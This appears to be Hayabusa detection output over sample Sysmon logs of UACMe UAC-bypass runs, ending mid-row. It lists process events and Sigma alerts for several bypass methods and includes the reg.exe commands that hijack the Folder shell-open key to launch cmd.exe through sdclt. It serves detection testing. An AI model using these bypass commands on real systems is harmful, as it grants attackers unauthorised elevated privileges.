Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process 